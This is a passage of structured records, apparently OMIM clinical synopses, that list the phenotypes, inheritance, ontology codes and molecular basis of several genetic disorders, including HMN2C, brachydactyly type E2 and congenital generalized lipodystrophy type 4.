'miscellaneous': '''Onset age 20 to 51 years {UMLS C3150489};\nIndependent ambulation is maintained {UMLS C3150490};\nVariable severity {UMLS C1861403 HP:0003828} {HPO HP:0003828 C1861403,C1866862};\nFemale mutations carriers have a milder phenotype, with myalgia, calf hypertrophy, or isolated increased serum creatine kinase {UMLS C3552743};\nLimb-girdle muscular dystrophy type 2L (LGMD2L, {611307}) is an allelic disorder''',
'molecularBasis': 'Caused by mutation in the anoctamin 5 gene (ANO5, {608662.0004})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613376,
'prefix': '#',
'preferredTitle': 'NEURONOPATHY, DISTAL HEREDITARY MOTOR, TYPE IIC; HMN2C',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'muscleSoftTissue': '''Distal lower and upper limb muscle atrophy {UMLS C1848736 HP:0003693};\nAtrophy of the intrinsic foot and hand muscles {UMLS C3150622}''',
'neurologicPeripheralNervousSystem': '''Muscle weakness, distal {SNOMEDCT:249942005} {UMLS C0427065 HP:0002460} {HPO HP:0002460 C0427065,C1864696};\nDistal lower limb muscle weakness {UMLS C1836450 HP:0009053} {HPO HP:0009053 C1836450};\nDistal upper limb muscle weakness {UMLS C3150620 HP:0008959} {HPO HP:0008959 C3150620};\nSteppage gait {SNOMEDCT:27253007} {UMLS C0427149 HP:0003376} {HPO HP:0003376 C0427149};\nDifficulty walking {SNOMEDCT:719232003,228158008} {ICD9CM:719.7} {UMLS C0311394 HP:0002355} {HPO HP:0002355 C0311394};\nEMG shows neurogenic abnormalities {UMLS C1846832};\nNeurophysiologic studies show a predominantly motor neuropathy {UMLS C2750686};\nHyporeflexia of lower limbs {UMLS C1834696 HP:0002600} {HPO HP:0002600 C1834696};\nAreflexia of lower limbs {UMLS C1856694 HP:0002522} {HPO HP:0002522 C1856694};\nNo or mild distal sensory deficit {UMLS C3150621}''',
'miscellaneous': '''Onset in early twenties {UMLS C3150624};\nSlowly progressive {UMLS C1854494 HP:0003677} {HPO HP:0003677 C1854494};\nLower limb involvement occurs before upper limb involvement {UMLS C3150625};\nOne family has been reported {UMLS C2750513}''',
'molecularBasis': 'Caused by mutation in the heat-shock 27-kD protein 3 gene (HSPB3, {604624.0001}).',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': True,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613320,
'prefix': '#',
'preferredTitle': 'SPONDYLOMETAPHYSEAL DYSPLASIA, MEGARBANE-DAGHER-MELKI TYPE; SMDMDM',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthHeight': 'Short stature, pre- and postnatal {UMLS C3150493}',
'growthWeight': 'Low birth weight {SNOMEDCT:267258002,276610007} {UMLS C0024032 HP:0001518} {HPO HP:0001518 C0024032,C0235991}',
'headAndNeckHead': '''Large fontanelles {SNOMEDCT:276709006} {UMLS C0456132 HP:0000239} {HPO HP:0000239 C0456132,C4072820,C4072821,C4072822};\nProminent forehead {UMLS C1837260 HP:0011220} {HPO HP:0011220 C1837260,C1867446} {EOM ID:510a51e4083c1d6f IMG:Forehead,Prominent-small.jpg}''',
'headAndNeckFace': 'Round face {UMLS C0239479 HP:0000311} {HPO HP:0000311 C0239479,C1856468} {EOM ID:a98d48239172dc71 IMG:Face,Round-small.jpg}',
'headAndNeckEars': '''Small ears {SNOMEDCT:35045004} {ICD10CM:Q17.2} {ICD9CM:744.23} {UMLS C0152423 HP:0008551} {HPO HP:0008551 C0152423};\nLow-set ears {SNOMEDCT:95515009} {ICD10CM:Q17.4} {UMLS C0239234 HP:0000369} {HPO HP:0000369 C0239234}''',
'headAndNeckNose': '''Depressed nasal bridge {UMLS C1836542 HP:0005280} {HPO HP:0005280 C1836542,C3550546,C4280495} {EOM ID:000fb29123c16757 IMG:Nasal_Bridge,Depressed-small.jpg};\nShort nose {UMLS C1854114 HP:0003196} {HPO HP:0003196 C0426414,C1854114} {EOM ID:daeb9fb85b0b970f IMG:Nose,Short-small.jpg};\nWide nostrils {SNOMEDCT:399353008} {UMLS C0426440 HP:0009931};\nAnteverted nares {SNOMEDCT:708670007} {UMLS C1840077 HP:0000463} {HPO HP:0000463 C1840077} {EOM ID:d7284223e790d7aa IMG:Nares,Anteverted-small.jpg};\nIncreased nasal width {SNOMEDCT:249321001} {UMLS C0426421 HP:0000445} {HPO HP:0000445 C0426421}''',
'headAndNeckMouth': 'Deep philtrum {UMLS C1839797 HP:0002002} {HPO HP:0002002 C1839797,C4020861} {EOM ID:3c771454d4293f5e IMG:Philtrum,Deep-small.jpg}',
'headAndNeckNeck': 'Short neck {SNOMEDCT:95427009} {UMLS C0521525 HP:0000470} {HPO HP:0000470 C0521525} {EOM ID:c75e63fd749ec7a8 IMG:Neck,Short-small.jpg}',
'cardiovascularHeart': '''Cardiomegaly {SNOMEDCT:8186001} {ICD10CM:I51.7} {ICD9CM:429.3} {UMLS C0018800 HP:0001640} {HPO HP:0001640 C0018800};\nGlobal left ventricular hypokinesia {UMLS C4229844};\nRight atrium dilatation {UMLS C4229843};\nPulmonary hypertension {SNOMEDCT:70995007} {ICD10CM:I27.20} {UMLS C0020542,C1963220}''',
'respiratory': 'Tachypnea {SNOMEDCT:271823003} {ICD10CM:R06.82} {ICD9CM:786.06} {UMLS C0231835 HP:0002789} {HPO HP:0002789 C0231835}',
'chestExternalFeatures': '''Narrow chest {SNOMEDCT:249671009} {UMLS C0426790 HP:0000774} {HPO HP:0000774 C0426790};\nBell-shaped thorax {UMLS C1865186 HP:0001591} {HPO HP:0001591 C1865186}''',
'chestRibsSternumClaviclesAndScapulae': '''Short ribs {SNOMEDCT:249696007} {UMLS C0426817 HP:0000773} {HPO HP:0000773 C0426817};\nCupped end ribs {UMLS C3150492}''',
'abdomenExternalFeatures': 'Prominent abdomen {UMLS C1850290}',
'skeletal': 'Delayed bone age {SNOMEDCT:123983008} {UMLS C0541764 HP:0002750} {HPO HP:0002750 C0541764}',
'skeletalSkull': 'Wormian bones {SNOMEDCT:113194005} {UMLS C0222716 HP:0002645} {HPO HP:0002645 C0222716}',
'skeletalSpine': '''Severe platyspondyly {UMLS C1850293 HP:0004565} {HPO HP:0004565 C1850293};\nSlightly ovoid vertebrae {UMLS C4229848};\nPartial sacral agenesis {SNOMEDCT:253189008} {UMLS C0431414 HP:0008455} {HPO HP:0008455 C1851305};\nDecrease in interpedicular distance in the lumbar vertebrae {UMLS C4229846}''',
'skeletalPelvis': '''Square iliac bones {UMLS C1838186 HP:0003177} {HPO HP:0003177 C1838186};\nHorizontal acetabula with medial and lateral spurs {UMLS C3150495};\nHypoplastic ischia {UMLS C1859447 HP:0003175} {HPO HP:0003175 C1859447};\nLacy appearance of iliac crest {UMLS C1857186 HP:0008786} {HPO HP:0008786 C1857186};\nTrident acetabula {UMLS C3810182}''',
'skeletalLimbs': '''Short limbs {UMLS C0239399 HP:0009826} {HPO HP:0009826 C0239399};\nShort long bones {UMLS C1854912 HP:0003026};\nSlight widening of the distal femoral metaphyses {UMLS C3150496};\nAbsence of epiphyseal ossification of the knees {UMLS C3150497};\nAbnormal modeling of the long bones {UMLS C4229845};\nBowed femora {UMLS C1859461 HP:0002980};\nMetaphyseal cupping {UMLS C1837082 HP:0003021} {HPO HP:0003021 C1837082}''',
'neurologicCentralNervousSystem': '''Developmental delay {SNOMEDCT:248290002,224958001} {ICD10CM:F88} {ICD9CM:315.9} {UMLS C0424605,C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nAxial hypotonia {UMLS C1853743 HP:0008936} {HPO HP:0008936 C1853743}''',
'miscellaneous': '''Bone abnormalities improve with age {UMLS C3150498};\nReduced longevity {UMLS C4229841};\nTwo consanguineous Lebanese families have been reported (last curated March 2015) {UMLS C4229840}''',
'molecularBasis': 'Caused by mutation in the homolog of the S. cerevisiae presequence translocase-associated motor 16 gene (PAM16, {614336.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': True,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': True,
'chestRibsSternumClaviclesAndScapulaeExists': True,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': True,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': True,
'skeletalSpineExists': True,
'skeletalPelvisExists': True,
'skeletalLimbsExists': True,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613382,
'prefix': '#',
'preferredTitle': 'BRACHYDACTYLY, TYPE E2; BDE2',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'growthHeight': 'Short stature {SNOMEDCT:422065006,237837007,237836003} {ICD10CM:R62.52,E34.3} {ICD9CM:783.43} {UMLS C0013336,C0349588,C2237041,C2919142 HP:0004322,HP:0003510} {HPO HP:0004322 C0349588}',
'headAndNeckTeeth': '''Delayed eruption, primary and secondary (in some patients) {UMLS C3150645};\nOligodontia (in some patients) {UMLS C3150646} {HPO HP:0000677 C4082304,C4280619}''',
'skeletalHands': 'Short metacarpals, III-V {UMLS C3150647}',
'skeletalFeet': 'Short metatarsals {UMLS C1849020 HP:0010743} {HPO HP:0010743 C1849020}',
'molecularBasis': 'Caused by mutation in the parathyroid hormone-like hormone gene (PTHLH, {168470.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': True,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': True,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': False,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613325,
'prefix': '#',
'preferredTitle': 'RHABDOID TUMOR PREDISPOSITION SYNDROME 2; RTPS2',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'neoplasia': '''Rhabdoid tumors, malignant {SNOMEDCT:83118000} {UMLS C0206743};\nSmall cell carcinoma of the ovary, hypercalcemic type {UMLS C4013716}''',
'miscellaneous': 'Increased risk of developing early-onset aggressive cancers {UMLS C4013718}',
'molecularBasis': 'Caused by mutation in the SWI/SNF-related, matrix-associated, actin-dependent regulator of chromatin, subfamily A, member 4 gene (SMARCA4, {603254.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': True,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613327,
'prefix': '#',
'preferredTitle': 'LIPODYSTROPHY, CONGENITAL GENERALIZED, TYPE 4; CGL4',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthOther': 'Failure to thrive {SNOMEDCT:54840006,433476000,432788009} {ICD10CM:R62.51} {ICD9CM:783.41} {UMLS C2315100,C0015544,C3887638 HP:0001508} {HPO HP:0001508 C0231246,C2315100}',
'cardiovascularHeart': '''Long QT syndrome {SNOMEDCT:111975006,9651007} {ICD10CM:I45.81} {ICD9CM:426.82} {UMLS C0023976,C0151878 HP:0001657} {HPO HP:0001657 C0151878};\nAtrial fibrillation {SNOMEDCT:164889003,49436004} {ICD9CM:427.31} {UMLS C0344434,C0004238,C2926591,C1963067 HP:0005110} {HPO HP:0005110 C0004238};\nArrhythmia {SNOMEDCT:698247007} {ICD10CM:I49.9} {ICD9CM:427,427.9} {UMLS C0003811 HP:0011675} {HPO HP:0011675 C0003811,C0264886,C0522055,C0855329,C1832603,C1842820};\nTachycardia {SNOMEDCT:86651002,3424008} {ICD10CM:R00.0} {ICD9CM:785.0} {UMLS C3827868,C0039231 HP:0001649} {HPO HP:0001649 C0039231,C4020868};\nBradycardia {SNOMEDCT:48867003} {ICD10CM:R00.1} {UMLS C0428977,C3812171 HP:0001662} {HPO HP:0001662 C0428977}''',
'abdomenExternalFeatures': '''Protruding abdomen {UMLS C1855750};\nProminent umbilicus {UMLS C1837795 HP:0001544} {HPO HP:0001544 C1837795}''',
'abdomenLiver': '''Hepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209};\nFatty liver {SNOMEDCT:197321007,442191002} {UMLS C0015695,C2711227 HP:0001397} {HPO HP:0001397 C2711227}''',
'abdomenSpleen': 'Splenomegaly {SNOMEDCT:16294009} {ICD10CM:R16.1} {ICD9CM:789.2} {UMLS C0038002 HP:0001744} {HPO HP:0001744 C0038002}',
'abdomenGastrointestinal': '''Poor feeding {SNOMEDCT:78164000,299698007} {ICD10CM:R63.3} {UMLS C0576456,C0232466 HP:0011968} {HPO HP:0011968 C0232466};\nDysphagia {SNOMEDCT:40739000,288939007} {ICD10CM:R13.1,R13.10} {ICD9CM:787.2,787.20} {UMLS C0011168,C1560331 HP:0002015,HP:0200136} {HPO HP:0002015 C0011168};\nConstipation {SNOMEDCT:14760008} {ICD10CM:K59.0,K59.00} {ICD9CM:564.0,564.00} {UMLS C1963087,C0009806,C3641755,C4084722,C4084723,C4084724 HP:0002019} {HPO HP:0002019 C0009806,C0237326};\nIleus {SNOMEDCT:710572000} {UMLS C1560456,C4019039,C1258215 HP:0002595} {HPO HP:0002595 C1258215};\nEsophageal dilatation {SNOMEDCT:78974003,195565004} {ICD9CM:42.92} {UMLS C0740287,C0192389};\nEsophageal dysmotility {SNOMEDCT:79962008,266434009} {ICD10CM:K22.4} {ICD9CM:530.5} {UMLS C0014858,C0014863 HP:0025271};\nHypertrophic pyloric stenosis {SNOMEDCT:48644003} {ICD10CM:Q40.0} {ICD9CM:750.5} {UMLS C0700639};\nSmooth muscle hypertrophy in the gastrointestinal tract {UMLS C3150508}''',
'skeletal': '''Joint contractures {SNOMEDCT:7890003} {ICD10CM:M24.5} {ICD9CM:718.40,718.4} {UMLS C0009918 HP:0001371} {HPO HP:0001371 C0009917,C0009918,C0333068,C1850530};\nOsteopenia {SNOMEDCT:312894000,78441005} {UMLS C0029453 HP:0000938} {HPO HP:0000938 C0029453,C0747078};\nOsteoporosis {SNOMEDCT:64859006} {ICD10CM:Z82.62,M81.0} {ICD9CM:733.0,V17.81,733.00} {UMLS C4554622,C2911643,C0029456,C1962963 HP:0000939} {HPO HP:0000939 C0029456}''',
'skeletalSpine': '''Spinal rigidity {UMLS C1858025 HP:0003306} {HPO HP:0003306 C1858025};\nHyperlordosis {SNOMEDCT:249710008,61960001} {ICD10CM:M40.5} {UMLS C0024003 HP:0003307} {HPO HP:0003307 C0024003};\nScoliosis {SNOMEDCT:298382003,20944008,111266001} {ICD10CM:Q67.5,M41,M41.9} {UMLS C0559260,C0036439,C4552773,C0700208 HP:0002650} {HPO HP:0002650 C0037932,C0700208};\nAtlanto-axial instability {UMLS C3150511}''',
'skinNailsHairHair': '''Acanthosis nigricans {SNOMEDCT:72129000,402599005} {ICD10CM:L83} {UMLS C0000889 HP:0000956} {HPO HP:0000956 C0000889};\nHirsutism (less common) {UMLS C3150512} {HPO HP:0001007 C0019572}''',
'muscleSoftTissue': '''Muscle weakness, proximal {SNOMEDCT:249939004} {UMLS C0221629 HP:0003701} {HPO HP:0003701 C0221629,C1838869};\nMuscle weakness, generalized {ICD10CM:M62.81} {ICD9CM:728.87} {UMLS C0746674 HP:0003324} {HPO HP:0003324 C0746674};\nExercise intolerance {SNOMEDCT:267044007} {UMLS C0424551 HP:0003546} {HPO HP:0003546 C0424551};\nPercussion-induced muscle mounding (muscle rippling) {UMLS C3150502};\nMuscle hypertrophy {SNOMEDCT:249829006} {UMLS C0236033,C2265792 HP:0003712} {HPO HP:0003712 C2265792};\nProminent muscular appearance {UMLS C3150503};\nMyalgia {SNOMEDCT:68962001} {ICD10CM:M79.1} {UMLS C0231528,C4552646 HP:0003326} {HPO HP:0003326 C0231528};\nMuscle stiffness {SNOMEDCT:16046003} {UMLS C4085861,C0221170 HP:0003552} {HPO HP:0003552 C0221170};\nMuscle biopsy shows dystrophic changes {UMLS C1864711 HP:0003560} {HPO HP:0003560 C0026850,C1864711};\nDecreased sarcolemmal immunostaining for PTRF {UMLS C3150504};\nSecondary loss of sarcolemmal caveolin-3 {UMLS C3150505};\nDecreased caveolae in muscle tissue {UMLS C3150506};\nLoss of subcutaneous fat, generalized {UMLS C3150507}''',
'endocrineFeatures': '''Hyperinsulinemia {SNOMEDCT:83469008,131103005} {ICD10CM:E16.1} {UMLS C0020459,C0852795 HP:0000842} {HPO HP:0000842 C0020459};\nInsulin resistance {SNOMEDCT:48606007,763325000} {UMLS C0021655,C4049994 HP:0000855} {HPO HP:0000855 C0021655};\nAcromegaloid features {UMLS C3150500};\nDecreased growth hormone secretion (1 patient) {UMLS C3150501}''',
'immunology': '''Transient IgA deficiency (1 patient) {UMLS C3150509};\nRecurrent infections {SNOMEDCT:451991000124106} {UMLS C0239998 HP:0002719} {HPO HP:0002719 C0239998};\nDefective humoral immunity {UMLS C3150510 HP:0005368} {HPO HP:0005368 C3150510}''',
'laboratoryAbnormalities': '''Increased serum creatine kinase {UMLS C0241005 HP:0003236} {HPO HP:0003236 C0151576,C0241005};\nIncreased serum triglycerides {SNOMEDCT:166848004} {UMLS C0813230 HP:0002155} {HPO HP:0002155 C1522137};\nAbnormal liver enzymes {SNOMEDCT:166643006} {UMLS C0438237 HP:0002910} {HPO HP:0002910 C0086565,C0151766,C0235996,C0438237,C0438717,C0877359,C1842003,C1848701}''',
'miscellaneous': '''Onset in infancy or early childhood {UMLS C1837138};\nSudden death due to cardiac arrhythmia may occur {UMLS C3150514}''',
'molecularBasis': 'Caused by mutation in the RNA polymerase I and transcript release factor gene (PTRF, {603198.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': True,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
